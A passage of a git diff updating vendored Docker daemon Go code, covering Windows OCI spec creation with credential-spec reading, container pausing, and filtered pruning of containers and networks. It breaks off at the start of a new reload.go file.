- id := nw.ID() - if len(nw.ID()) > 12 { - id = nw.ID()[:12] - } - lowerLink = "vx_" + id + "_0" - } - - runzanet := specs.Anet{ - Linkname: linkName, - Lowerlink: lowerLink, - Allowedaddr: epInfo.Iface().Address().String(), - Configallowedaddr: "true", - Defrouter: defRouter, - Linkprotection: "mac-nospoof, ip-nospoof", - Macaddress: epInfo.Iface().MacAddress().String(), - } - - return runzanet, nil -} - -func (daemon *Daemon) setNetworkInterface(s *specs.Spec, c *container.Container) error { - var anets []specs.Anet - - sb, err := daemon.netController.SandboxByID(c.NetworkSettings.SandboxID) - if err != nil { - return fmt.Errorf("Could not obtain sandbox for container") - } - - // Populate interfaces required for each endpoint - for _, ep := range sb.Endpoints() { - runzanet, err := daemon.getRunzAnet(ep) - if err != nil { - return fmt.Errorf("Failed to get interface information for endpoint %d: %v", ep.ID(), err) - } - anets = append(anets, runzanet) - } - - s.Solaris.Anet = anets - if anets != nil { - s.Solaris.Milestone = "svc:/milestone/container:default" - } - return nil -} - -func (daemon *Daemon) populateCommonSpec(s *specs.Spec, c *container.Container) error { - linkedEnv, err := daemon.setupLinkedContainers(c) - if err != nil { - return err - } - s.Root = specs.Root{ - Path: filepath.Dir(c.BaseFS), - Readonly: c.HostConfig.ReadonlyRootfs, - } - rootUID, rootGID := daemon.GetRemappedUIDGID() - if err := c.SetupWorkingDirectory(rootUID, rootGID); err != nil { - return err - } - cwd := c.Config.WorkingDir - s.Process.Args = append([]string{c.Path}, c.Args...) 
- s.Process.Cwd = cwd - s.Process.Env = c.CreateDaemonEnvironment(c.Config.Tty, linkedEnv) - s.Process.Terminal = c.Config.Tty - s.Hostname = c.FullHostname() - - return nil -} - -func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { - s := oci.DefaultSpec() - if err := daemon.populateCommonSpec(&s, c); err != nil { - return nil, err - } - - if err := setResources(&s, c.HostConfig.Resources); err != nil { - return nil, fmt.Errorf("runtime spec resources: %v", err) - } - - if err := setUser(&s, c); err != nil { - return nil, fmt.Errorf("spec user: %v", err) - } - - if err := daemon.setNetworkInterface(&s, c); err != nil { - return nil, err - } - - if err := daemon.setupIpcDirs(c); err != nil { - return nil, err - } - - ms, err := daemon.setupMounts(c) - if err != nil { - return nil, err - } - ms = append(ms, c.IpcMounts()...) - tmpfsMounts, err := c.TmpfsMounts() - if err != nil { - return nil, err - } - ms = append(ms, tmpfsMounts...) - sort.Sort(mounts(ms)) - - return (*specs.Spec)(&s), nil -} - -// mergeUlimits merge the Ulimits from HostConfig with daemon defaults, and update HostConfig -// It will do nothing on non-Linux platform -func (daemon *Daemon) mergeUlimits(c *containertypes.HostConfig) { - return -} diff --git a/vendor/github.com/docker/docker/daemon/oci_windows.go b/vendor/github.com/docker/docker/daemon/oci_windows.go index 6e264243b4..6279d7dd20 100644 --- a/vendor/github.com/docker/docker/daemon/oci_windows.go +++ b/vendor/github.com/docker/docker/daemon/oci_windows.go @@ -1,17 +1,35 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "syscall" + "fmt" + "io/ioutil" + "path/filepath" + "runtime" + "strings" containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/container" "github.com/docker/docker/oci" "github.com/docker/docker/pkg/sysinfo" + "github.com/docker/docker/pkg/system" "github.com/opencontainers/runtime-spec/specs-go" + 
"github.com/pkg/errors" + "golang.org/x/sys/windows" + "golang.org/x/sys/windows/registry" +) + +const ( + credentialSpecRegistryLocation = `SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization\Containers\CredentialSpecs` + credentialSpecFileLocation = "CredentialSpecs" ) func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { - s := oci.DefaultSpec() + img, err := daemon.imageService.GetImage(string(c.ImageID)) + if err != nil { + return nil, err + } + + s := oci.DefaultOSSpec(img.OS) linkedEnv, err := daemon.setupLinkedContainers(c) if err != nil { @@ -25,11 +43,69 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { // In base spec s.Hostname = c.FullHostname() + if err := daemon.setupSecretDir(c); err != nil { + return nil, err + } + + if err := daemon.setupConfigDir(c); err != nil { + return nil, err + } + // In s.Mounts mounts, err := daemon.setupMounts(c) if err != nil { return nil, err } + + var isHyperV bool + if c.HostConfig.Isolation.IsDefault() { + // Container using default isolation, so take the default from the daemon configuration + isHyperV = daemon.defaultIsolation.IsHyperV() + } else { + // Container may be requesting an explicit isolation mode. + isHyperV = c.HostConfig.Isolation.IsHyperV() + } + + if isHyperV { + s.Windows.HyperV = &specs.WindowsHyperV{} + } + + // If the container has not been started, and has configs or secrets + // secrets, create symlinks to each config and secret. If it has been + // started before, the symlinks should have already been created. Also, it + // is important to not mount a Hyper-V container that has been started + // before, to protect the host from the container; for example, from + // malicious mutation of NTFS data structures. 
+ if !c.HasBeenStartedBefore && (len(c.SecretReferences) > 0 || len(c.ConfigReferences) > 0) { + // The container file system is mounted before this function is called, + // except for Hyper-V containers, so mount it here in that case. + if isHyperV { + if err := daemon.Mount(c); err != nil { + return nil, err + } + defer daemon.Unmount(c) + } + if err := c.CreateSecretSymlinks(); err != nil { + return nil, err + } + if err := c.CreateConfigSymlinks(); err != nil { + return nil, err + } + } + + secretMounts, err := c.SecretMounts() + if err != nil { + return nil, err + } + if secretMounts != nil { + mounts = append(mounts, secretMounts...) + } + + configMounts := c.ConfigMounts() + if configMounts != nil { + mounts = append(mounts, configMounts...) + } + for _, mount := range mounts { m := specs.Mount{ Source: mount.Source, @@ -38,15 +114,115 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { if !mount.Writable { m.Options = append(m.Options, "ro") } + if img.OS != runtime.GOOS { + m.Type = "bind" + m.Options = append(m.Options, "rbind") + m.Options = append(m.Options, fmt.Sprintf("uvmpath=/tmp/gcs/%s/binds", c.ID)) + } s.Mounts = append(s.Mounts, m) } // In s.Process s.Process.Args = append([]string{c.Path}, c.Args...) 
- if !c.Config.ArgsEscaped { + if !c.Config.ArgsEscaped && img.OS == "windows" { s.Process.Args = escapeArgs(s.Process.Args) } + s.Process.Cwd = c.Config.WorkingDir + s.Process.Env = c.CreateDaemonEnvironment(c.Config.Tty, linkedEnv) + if c.Config.Tty { + s.Process.Terminal = c.Config.Tty + s.Process.ConsoleSize = &specs.Box{ + Height: c.HostConfig.ConsoleSize[0], + Width: c.HostConfig.ConsoleSize[1], + } + } + s.Process.User.Username = c.Config.User + s.Windows.LayerFolders, err = daemon.imageService.GetLayerFolders(img, c.RWLayer) + if err != nil { + return nil, errors.Wrapf(err, "container %s", c.ID) + } + + dnsSearch := daemon.getDNSSearchSettings(c) + + // Get endpoints for the libnetwork allocated networks to the container + var epList []string + AllowUnqualifiedDNSQuery := false + gwHNSID := "" + if c.NetworkSettings != nil { + for n := range c.NetworkSettings.Networks { + sn, err := daemon.FindNetwork(n) + if err != nil { + continue + } + + ep, err := getEndpointInNetwork(c.Name, sn) + if err != nil { + continue + } + + data, err := ep.DriverInfo() + if err != nil { + continue + } + + if data["GW_INFO"] != nil { + gwInfo := data["GW_INFO"].(map[string]interface{}) + if gwInfo["hnsid"] != nil { + gwHNSID = gwInfo["hnsid"].(string) + } + } + + if data["hnsid"] != nil { + epList = append(epList, data["hnsid"].(string)) + } + + if data["AllowUnqualifiedDNSQuery"] != nil { + AllowUnqualifiedDNSQuery = true + } + } + } + + var networkSharedContainerID string + if c.HostConfig.NetworkMode.IsContainer() { + networkSharedContainerID = c.NetworkSharedContainerID + for _, ep := range c.SharedEndpointList { + epList = append(epList, ep) + } + } + + if gwHNSID != "" { + epList = append(epList, gwHNSID) + } + + s.Windows.Network = &specs.WindowsNetwork{ + AllowUnqualifiedDNSQuery: AllowUnqualifiedDNSQuery, + DNSSearchList: dnsSearch, + EndpointList: epList, + NetworkSharedContainerName: networkSharedContainerID, + } + + switch img.OS { + case "windows": + if err := 
daemon.createSpecWindowsFields(c, &s, isHyperV); err != nil { + return nil, err + } + case "linux": + if !system.LCOWSupported() { + return nil, fmt.Errorf("Linux containers on Windows are not supported") + } + if err := daemon.createSpecLinuxFields(c, &s); err != nil { + return nil, err + } + default: + return nil, fmt.Errorf("Unsupported platform %q", img.OS) + } + + return (*specs.Spec)(&s), nil +} + +// Sets the Windows-specific fields of the OCI spec +func (daemon *Daemon) createSpecWindowsFields(c *container.Container, s *specs.Spec, isHyperV bool) error { if len(s.Process.Cwd) == 0 { // We default to C:\ to workaround the oddity of the case that the // default directory for cmd running as LocalSystem (or @@ -57,60 +233,132 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { // as c:\. Hence, setting it to default of c:\ makes for consistency. s.Process.Cwd = `C:\` } - s.Process.Env = c.CreateDaemonEnvironment(c.Config.Tty, linkedEnv) - s.Process.ConsoleSize.Height = c.HostConfig.ConsoleSize[0] - s.Process.ConsoleSize.Width = c.HostConfig.ConsoleSize[1] - s.Process.Terminal = c.Config.Tty - s.Process.User.Username = c.Config.User - // In spec.Root. This is not set for Hyper-V containers - isHyperV := false - if c.HostConfig.Isolation.IsDefault() { - // Container using default isolation, so take the default from the daemon configuration - isHyperV = daemon.defaultIsolation.IsHyperV() - } else { - // Container may be requesting an explicit isolation mode. 
- isHyperV = c.HostConfig.Isolation.IsHyperV() - } + s.Root.Readonly = false // Windows does not support a read-only root filesystem if !isHyperV { - s.Root.Path = c.BaseFS + if c.BaseFS == nil { + return errors.New("createSpecWindowsFields: BaseFS of container " + c.ID + " is unexpectedly nil") + } + + s.Root.Path = c.BaseFS.Path() // This is not set for Hyper-V containers + if !strings.HasSuffix(s.Root.Path, `\`) { + s.Root.Path = s.Root.Path + `\` // Ensure a correctly formatted volume GUID path \\?\Volume{GUID}\ + } } - s.Root.Readonly = false // Windows does not support a read-only root filesystem + + // First boot optimization + s.Windows.IgnoreFlushesDuringBoot = !c.HasBeenStartedBefore // In s.Windows.Resources - // @darrenstahlmsft implement these resources cpuShares := uint16(c.HostConfig.CPUShares) - cpuPercent := uint8(c.HostConfig.CPUPercent) + cpuMaximum := uint16(c.HostConfig.CPUPercent) * 100 + cpuCount := uint64(c.HostConfig.CPUCount) if c.HostConfig.NanoCPUs > 0 { - cpuPercent = uint8(c.HostConfig.NanoCPUs * 100 / int64(sysinfo.NumCPU()) / 1e9) + if isHyperV { + cpuCount = uint64(c.HostConfig.NanoCPUs / 1e9) + leftoverNanoCPUs := c.HostConfig.NanoCPUs % 1e9 + if leftoverNanoCPUs != 0 { + cpuCount++ + cpuMaximum = uint16(c.HostConfig.NanoCPUs / int64(cpuCount) / (1e9 / 10000)) + if cpuMaximum < 1 { + // The requested NanoCPUs is so small that we rounded to 0, use 1 instead + cpuMaximum = 1 + } + } + } else { + cpuMaximum = uint16(c.HostConfig.NanoCPUs / int64(sysinfo.NumCPU()) / (1e9 / 10000)) + if cpuMaximum < 1 { + // The requested NanoCPUs is so small that we rounded to 0, use 1 instead + cpuMaximum = 1 + } + } } - cpuCount := uint64(c.HostConfig.CPUCount) memoryLimit := uint64(c.HostConfig.Memory) s.Windows.Resources = &specs.WindowsResources{ CPU: &specs.WindowsCPUResources{ - Percent: &cpuPercent, + Maximum: &cpuMaximum, Shares: &cpuShares, Count: &cpuCount, }, Memory: &specs.WindowsMemoryResources{ Limit: &memoryLimit, - //TODO Reservation: 
..., - }, - Network: &specs.WindowsNetworkResources{ - //TODO Bandwidth: ..., }, Storage: &specs.WindowsStorageResources{ Bps: &c.HostConfig.IOMaximumBandwidth, Iops: &c.HostConfig.IOMaximumIOps, }, } - return (*specs.Spec)(&s), nil + + // Read and add credentials from the security options if a credential spec has been provided. + if c.HostConfig.SecurityOpt != nil { + cs := "" + for _, sOpt := range c.HostConfig.SecurityOpt { + sOpt = strings.ToLower(sOpt) + if !strings.Contains(sOpt, "=") { + return fmt.Errorf("invalid security option: no equals sign in supplied value %s", sOpt) + } + var splitsOpt []string + splitsOpt = strings.SplitN(sOpt, "=", 2) + if len(splitsOpt) != 2 { + return fmt.Errorf("invalid security option: %s", sOpt) + } + if splitsOpt[0] != "credentialspec" { + return fmt.Errorf("security option not supported: %s", splitsOpt[0]) + } + + var ( + match bool + csValue string + err error + ) + if match, csValue = getCredentialSpec("file://", splitsOpt[1]); match { + if csValue == "" { + return fmt.Errorf("no value supplied for file:// credential spec security option") + } + if cs, err = readCredentialSpecFile(c.ID, daemon.root, filepath.Clean(csValue)); err != nil { + return err + } + } else if match, csValue = getCredentialSpec("registry://", splitsOpt[1]); match { + if csValue == "" { + return fmt.Errorf("no value supplied for registry:// credential spec security option") + } + if cs, err = readCredentialSpecRegistry(c.ID, csValue); err != nil { + return err + } + } else { + return fmt.Errorf("invalid credential spec security option - value must be prefixed file:// or registry:// followed by a value") + } + } + s.Windows.CredentialSpec = cs + } + + return nil +} + +// Sets the Linux-specific fields of the OCI spec +// TODO: @jhowardmsft LCOW Support. We need to do a lot more pulling in what can +// be pulled in from oci_linux.go. 
+func (daemon *Daemon) createSpecLinuxFields(c *container.Container, s *specs.Spec) error { + if len(s.Process.Cwd) == 0 { + s.Process.Cwd = `/` + } + s.Root.Path = "rootfs" + s.Root.Readonly = c.HostConfig.ReadonlyRootfs + if err := setCapabilities(s, c); err != nil { + return fmt.Errorf("linux spec capabilities: %v", err) + } + devPermissions, err := appendDevicePermissionsFromCgroupRules(nil, c.HostConfig.DeviceCgroupRules) + if err != nil { + return fmt.Errorf("linux runtime spec devices: %v", err) + } + s.Linux.Resources.Devices = devPermissions + return nil } func escapeArgs(args []string) []string { escapedArgs := make([]string, len(args)) for i, a := range args { - escapedArgs[i] = syscall.EscapeArg(a) + escapedArgs[i] = windows.EscapeArg(a) } return escapedArgs } @@ -120,3 +368,52 @@ func escapeArgs(args []string) []string { func (daemon *Daemon) mergeUlimits(c *containertypes.HostConfig) { return } + +// getCredentialSpec is a helper function to get the value of a credential spec supplied +// on the CLI, stripping the prefix +func getCredentialSpec(prefix, value string) (bool, string) { + if strings.HasPrefix(value, prefix) { + return true, strings.TrimPrefix(value, prefix) + } + return false, "" +} + +// readCredentialSpecRegistry is a helper function to read a credential spec from +// the registry. If not found, we return an empty string and warn in the log. +// This allows for staging on machines which do not have the necessary components. 
+func readCredentialSpecRegistry(id, name string) (string, error) { + var ( + k registry.Key + err error + val string + ) + if k, err = registry.OpenKey(registry.LOCAL_MACHINE, credentialSpecRegistryLocation, registry.QUERY_VALUE); err != nil { + return "", fmt.Errorf("failed handling spec %q for container %s - %s could not be opened", name, id, credentialSpecRegistryLocation) + } + if val, _, err = k.GetStringValue(name); err != nil { + if err == registry.ErrNotExist { + return "", fmt.Errorf("credential spec %q for container %s as it was not found", name, id) + } + return "", fmt.Errorf("error %v reading credential spec %q from registry for container %s", err, name, id) + } + return val, nil +} + +// readCredentialSpecFile is a helper function to read a credential spec from +// a file. If not found, we return an empty string and warn in the log. +// This allows for staging on machines which do not have the necessary components. +func readCredentialSpecFile(id, root, location string) (string, error) { + if filepath.IsAbs(location) { + return "", fmt.Errorf("invalid credential spec - file:// path cannot be absolute") + } + base := filepath.Join(root, credentialSpecFileLocation) + full := filepath.Join(base, location) + if !strings.HasPrefix(full, base) { + return "", fmt.Errorf("invalid credential spec - file:// path must be under %s", base) + } + bcontents, err := ioutil.ReadFile(full) + if err != nil { + return "", fmt.Errorf("credential spec '%s' for container %s as the file could not be read: %q", full, id, err) + } + return string(bcontents[:]), nil +} diff --git a/vendor/github.com/docker/docker/daemon/pause.go b/vendor/github.com/docker/docker/daemon/pause.go index dbfafbc5fd..be6ec1b92a 100644 --- a/vendor/github.com/docker/docker/daemon/pause.go +++ b/vendor/github.com/docker/docker/daemon/pause.go @@ -1,9 +1,11 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" "github.com/docker/docker/container" + 
"github.com/sirupsen/logrus" ) // ContainerPause pauses a container @@ -12,12 +14,7 @@ func (daemon *Daemon) ContainerPause(name string) error { if err != nil { return err } - - if err := daemon.containerPause(container); err != nil { - return err - } - - return nil + return daemon.containerPause(container) } // containerPause pauses the container execution without stopping the process. @@ -28,12 +25,12 @@ func (daemon *Daemon) containerPause(container *container.Container) error { // We cannot Pause the container which is not running if !container.Running { - return errNotRunning{container.ID} + return errNotRunning(container.ID) } // We cannot Pause the container which is already paused if container.Paused { - return fmt.Errorf("Container %s is already paused", container.ID) + return errNotPaused(container.ID) } // We cannot Pause the container which is restarting @@ -41,9 +38,18 @@ func (daemon *Daemon) containerPause(container *container.Container) error { return errContainerIsRestarting(container.ID) } - if err := daemon.containerd.Pause(container.ID); err != nil { + if err := daemon.containerd.Pause(context.Background(), container.ID); err != nil { return fmt.Errorf("Cannot pause container %s: %s", container.ID, err) } + container.Paused = true + daemon.setStateCounter(container) + daemon.updateHealthMonitor(container) + daemon.LogContainerEvent(container, "pause") + + if err := container.CheckpointTo(daemon.containersReplica); err != nil { + logrus.WithError(err).Warn("could not save container to disk") + } + return nil } diff --git a/vendor/github.com/docker/docker/daemon/prune.go b/vendor/github.com/docker/docker/daemon/prune.go index a693beb4e1..b690f2e552 100644 --- a/vendor/github.com/docker/docker/daemon/prune.go +++ b/vendor/github.com/docker/docker/daemon/prune.go @@ -1,165 +1,87 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" "regexp" + "sync/atomic" + "time" - "github.com/Sirupsen/logrus" - 
"github.com/docker/distribution/digest" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/image" - "github.com/docker/docker/layer" - "github.com/docker/docker/pkg/directory" - "github.com/docker/docker/reference" + timetypes "github.com/docker/docker/api/types/time" + "github.com/docker/docker/errdefs" "github.com/docker/docker/runconfig" - "github.com/docker/docker/volume" "github.com/docker/libnetwork" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) -// ContainersPrune removes unused containers -func (daemon *Daemon) ContainersPrune(pruneFilters filters.Args) (*types.ContainersPruneReport, error) { - rep := &types.ContainersPruneReport{} +var ( + // errPruneRunning is returned when a prune request is received while + // one is in progress + errPruneRunning = errdefs.Conflict(errors.New("a prune operation is already running")) - allContainers := daemon.List() - for _, c := range allContainers { - if !c.IsRunning() { - cSize, _ := daemon.getSize(c) - // TODO: sets RmLink to true? 
- err := daemon.ContainerRm(c.ID, &types.ContainerRmConfig{}) - if err != nil { - logrus.Warnf("failed to prune container %s: %v", c.ID, err) - continue - } - if cSize > 0 { - rep.SpaceReclaimed += uint64(cSize) - } - rep.ContainersDeleted = append(rep.ContainersDeleted, c.ID) - } + containersAcceptedFilters = map[string]bool{ + "label": true, + "label!": true, + "until": true, } - return rep, nil -} - -// VolumesPrune removes unused local volumes -func (daemon *Daemon) VolumesPrune(pruneFilters filters.Args) (*types.VolumesPruneReport, error) { - rep := &types.VolumesPruneReport{} - - pruneVols := func(v volume.Volume) error { - name := v.Name() - refs := daemon.volumes.Refs(v) - - if len(refs) == 0 { - vSize, err := directory.Size(v.Path()) - if err != nil { - logrus.Warnf("could not determine size of volume %s: %v", name, err) - } - err = daemon.volumes.Remove(v) - if err != nil { - logrus.Warnf("could not remove volume %s: %v", name, err) - return nil - } - rep.SpaceReclaimed += uint64(vSize) - rep.VolumesDeleted = append(rep.VolumesDeleted, name) - } - - return nil + networksAcceptedFilters = map[string]bool{ + "label": true, + "label!": true, + "until": true, } +) - err := daemon.traverseLocalVolumes(pruneVols) - - return rep, err -} +// ContainersPrune removes unused containers +func (daemon *Daemon) ContainersPrune(ctx context.Context, pruneFilters filters.Args) (*types.ContainersPruneReport, error) { + if !atomic.CompareAndSwapInt32(&daemon.pruneRunning, 0, 1) { + return nil, errPruneRunning + } + defer atomic.StoreInt32(&daemon.pruneRunning, 0) -// ImagesPrune removes unused images -func (daemon *Daemon) ImagesPrune(pruneFilters filters.Args) (*types.ImagesPruneReport, error) { - rep := &types.ImagesPruneReport{} + rep := &types.ContainersPruneReport{} - danglingOnly := true - if pruneFilters.Include("dangling") { - if pruneFilters.ExactMatch("dangling", "false") || pruneFilters.ExactMatch("dangling", "0") { - danglingOnly = false - } else if 
!pruneFilters.ExactMatch("dangling", "true") && !pruneFilters.ExactMatch("dangling", "1") { - return nil, fmt.Errorf("Invalid filter 'dangling=%s'", pruneFilters.Get("dangling")) - } + // make sure that only accepted filters have been received + err := pruneFilters.Validate(containersAcceptedFilters) + if err != nil { + return nil, err } - var allImages map[image.ID]*image.Image - if danglingOnly { - allImages = daemon.imageStore.Heads() - } else { - allImages = daemon.imageStore.Map() + until, err := getUntilFromPruneFilters(pruneFilters) + if err != nil { + return nil, err } + allContainers := daemon.List() - imageRefs := map[string]bool{} for _, c := range allContainers { - imageRefs[c.ID] = true - } - - // Filter intermediary images and get their unique size - allLayers := daemon.layerStore.Map() - topImages := map[image.ID]*image.Image{} - for id, img := range allImages { - dgst := digest.Digest(id) - if len(daemon.referenceStore.References(dgst)) == 0 && len(daemon.imageStore.Children(id)) != 0 { - continue + select { + case <-ctx.Done(): + logrus.Debugf("ContainersPrune operation cancelled: %#v", *rep) + return rep, nil + default: } - topImages[id] = img - } - for id := range topImages { - dgst := digest.Digest(id) - hex := dgst.Hex() - if _, ok := imageRefs[hex]; ok { - continue - } - - deletedImages := []types.ImageDelete{} - refs := daemon.referenceStore.References(dgst) - if len(refs) > 0 { - if danglingOnly { - // Not a dangling image + if !c.IsRunning() { + if !until.IsZero() && c.Created.After(until) { continue } - - nrRefs := len(refs) - for _, ref := range refs { - // If nrRefs == 1, we have an image marked as myreponame: - // i.e. the tag content was changed - if _, ok := ref.(reference.Canonical); ok && nrRefs > 1 { - continue - } - imgDel, err := daemon.ImageDelete(ref.String(), false, true) - if err != nil { - logrus.Warnf("could not delete reference %s: %v", ref.String(), err) - continue - } - deletedImages = append(deletedImages, imgDel...) 
+ if !matchLabels(pruneFilters, c.Config.Labels) { + continue } - } else { - imgDel, err := daemon.ImageDelete(hex, false, true) + cSize, _ := daemon.imageService.GetContainerLayerSize(c.ID) + // TODO: sets RmLink to true? + err := daemon.ContainerRm(c.ID, &types.ContainerRmConfig{}) if err != nil { - logrus.Warnf("could not delete image %s: %v", hex, err) + logrus.Warnf("failed to prune container %s: %v", c.ID, err) continue } - deletedImages = append(deletedImages, imgDel...) - } - - rep.ImagesDeleted = append(rep.ImagesDeleted, deletedImages...) - } - - // Compute how much space was freed - for _, d := range rep.ImagesDeleted { - if d.Deleted != "" { - chid := layer.ChainID(d.Deleted) - if l, ok := allLayers[chid]; ok { - diffSize, err := l.DiffSize() - if err != nil { - logrus.Warnf("failed to get layer %s size: %v", chid, err) - continue - } - rep.SpaceReclaimed += uint64(diffSize) + if cSize > 0 { + rep.SpaceReclaimed += uint64(cSize) } + rep.ContainersDeleted = append(rep.ContainersDeleted, c.ID) } } @@ -167,70 +89,162 @@ func (daemon *Daemon) ImagesPrune(pruneFilters filters.Args) (*types.ImagesPrune } // localNetworksPrune removes unused local networks -func (daemon *Daemon) localNetworksPrune(pruneFilters filters.Args) (*types.NetworksPruneReport, error) { +func (daemon *Daemon) localNetworksPrune(ctx context.Context, pruneFilters filters.Args) *types.NetworksPruneReport { rep := &types.NetworksPruneReport{} - var err error + + until, _ := getUntilFromPruneFilters(pruneFilters) + // When the function returns true, the walk will stop. 
l := func(nw libnetwork.Network) bool { + select { + case <-ctx.Done(): + // context cancelled + return true + default: + } + if nw.Info().ConfigOnly() { + return false + } + if !until.IsZero() && nw.Info().Created().After(until) { + return false + } + if !matchLabels(pruneFilters, nw.Info().Labels()) { + return false + } nwName := nw.Name() - predefined := runconfig.IsPreDefinedNetwork(nwName) - if !predefined && len(nw.Endpoints()) == 0 { - if err = daemon.DeleteNetwork(nw.ID()); err != nil { - logrus.Warnf("could not remove network %s: %v", nwName, err) - return false - } - rep.NetworksDeleted = append(rep.NetworksDeleted, nwName) + if runconfig.IsPreDefinedNetwork(nwName) { + return false } + if len(nw.Endpoints()) > 0 { + return false + } + if err := daemon.DeleteNetwork(nw.ID()); err != nil { + logrus.Warnf("could not remove local network %s: %v", nwName, err) + return false + } + rep.NetworksDeleted = append(rep.NetworksDeleted, nwName) return false } daemon.netController.WalkNetworks(l) - return rep, err + return rep } // clusterNetworksPrune removes unused cluster networks -func (daemon *Daemon) clusterNetworksPrune(pruneFilters filters.Args) (*types.NetworksPruneReport, error) { +func (daemon *Daemon) clusterNetworksPrune(ctx context.Context, pruneFilters filters.Args) (*types.NetworksPruneReport, error) { rep := &types.NetworksPruneReport{} + + until, _ := getUntilFromPruneFilters(pruneFilters) + cluster := daemon.GetCluster() + + if !cluster.IsManager() { + return rep, nil + } + networks, err := cluster.GetNetworks() if err != nil { return rep, err } networkIsInUse := regexp.MustCompile(`network ([[:alnum:]]+) is in use`) for _, nw := range networks { - if nw.Name == "ingress" { - continue - } - // https://github.com/docker/docker/issues/24186 - // `docker network inspect` unfortunately displays ONLY those containers that are local to that node. 
- // So we try to remove it anyway and check the error - err = cluster.RemoveNetwork(nw.ID) - if err != nil { - // we can safely ignore the "network .. is in use" error - match := networkIsInUse.FindStringSubmatch(err.Error()) - if len(match) != 2 || match[1] != nw.ID { - logrus.Warnf("could not remove network %s: %v", nw.Name, err) + select { + case <-ctx.Done(): + return rep, nil + default: + if nw.Ingress { + // Routing-mesh network removal has to be explicitly invoked by user + continue } - continue + if !until.IsZero() && nw.Created.After(until) { + continue + } + if !matchLabels(pruneFilters, nw.Labels) { + continue + } + // https://github.com/docker/docker/issues/24186 + // `docker network inspect` unfortunately displays ONLY those containers that are local to that node. + // So we try to remove it anyway and check the error + err = cluster.RemoveNetwork(nw.ID) + if err != nil { + // we can safely ignore the "network .. is in use" error + match := networkIsInUse.FindStringSubmatch(err.Error()) + if len(match) != 2 || match[1] != nw.ID { + logrus.Warnf("could not remove cluster network %s: %v", nw.Name, err) + } + continue + } + rep.NetworksDeleted = append(rep.NetworksDeleted, nw.Name) } - rep.NetworksDeleted = append(rep.NetworksDeleted, nw.Name) } return rep, nil } // NetworksPrune removes unused networks -func (daemon *Daemon) NetworksPrune(pruneFilters filters.Args) (*types.NetworksPruneReport, error) { - rep := &types.NetworksPruneReport{} - clusterRep, err := daemon.clusterNetworksPrune(pruneFilters) +func (daemon *Daemon) NetworksPrune(ctx context.Context, pruneFilters filters.Args) (*types.NetworksPruneReport, error) { + if !atomic.CompareAndSwapInt32(&daemon.pruneRunning, 0, 1) { + return nil, errPruneRunning + } + defer atomic.StoreInt32(&daemon.pruneRunning, 0) + + // make sure that only accepted filters have been received + err := pruneFilters.Validate(networksAcceptedFilters) if err != nil { - logrus.Warnf("could not remove cluster networks: 
%v", err) - } else { + return nil, err + } + + if _, err := getUntilFromPruneFilters(pruneFilters); err != nil { + return nil, err + } + + rep := &types.NetworksPruneReport{} + if clusterRep, err := daemon.clusterNetworksPrune(ctx, pruneFilters); err == nil { rep.NetworksDeleted = append(rep.NetworksDeleted, clusterRep.NetworksDeleted...) } - localRep, err := daemon.localNetworksPrune(pruneFilters) + + localRep := daemon.localNetworksPrune(ctx, pruneFilters) + rep.NetworksDeleted = append(rep.NetworksDeleted, localRep.NetworksDeleted...) + + select { + case <-ctx.Done(): + logrus.Debugf("NetworksPrune operation cancelled: %#v", *rep) + return rep, nil + default: + } + + return rep, nil +} + +func getUntilFromPruneFilters(pruneFilters filters.Args) (time.Time, error) { + until := time.Time{} + if !pruneFilters.Contains("until") { + return until, nil + } + untilFilters := pruneFilters.Get("until") + if len(untilFilters) > 1 { + return until, fmt.Errorf("more than one until filter specified") + } + ts, err := timetypes.GetTimestamp(untilFilters[0], time.Now()) + if err != nil { + return until, err + } + seconds, nanoseconds, err := timetypes.ParseTimestamps(ts, 0) if err != nil { - logrus.Warnf("could not remove local networks: %v", err) - } else { - rep.NetworksDeleted = append(rep.NetworksDeleted, localRep.NetworksDeleted...) 
+ return until, err + } + until = time.Unix(seconds, nanoseconds) + return until, nil +} + +func matchLabels(pruneFilters filters.Args, labels map[string]string) bool { + if !pruneFilters.MatchKVList("label", labels) { + return false + } + // By default MatchKVList will return true if field (like 'label!') does not exist + // So we have to add additional Contains("label!") check + if pruneFilters.Contains("label!") { + if pruneFilters.MatchKVList("label!", labels) { + return false + } } - return rep, err + return true } diff --git a/vendor/github.com/docker/docker/daemon/reload.go b/vendor/github.com/docker/docker/daemon/reload.go new file mode 100644 index 0000000000..210864ff87 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/reload.go @@ -0,0 +1,324 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + "encoding/json" + "fmt" + + "github.com/docker/docker/daemon/config" + "github.com/docker/docker/daemon/discovery" + "github.com/sirupsen/logrus" +) + +// Reload reads configuration changes and modifies the +// daemon according to those changes. +// These are the settings that Reload changes: +// - Platform runtime +// - Daemon debug log level +// - Daemon max concurrent downloads +// - Daemon max concurrent uploads +// - Daemon shutdown timeout (in seconds) +// - Cluster discovery (reconfigure and restart) +// - Daemon labels +// - Insecure registries +// - Registry mirrors +// - Daemon live restore +func (daemon *Daemon) Reload(conf *config.Config) (err error) { + daemon.configStore.Lock() + attributes := map[string]string{} + + defer func() { + jsonString, _ := json.Marshal(daemon.configStore) + + // we're unlocking here, because + // LogDaemonEventWithAttributes() -> SystemInfo() -> GetAllRuntimes() + // holds that lock too. 
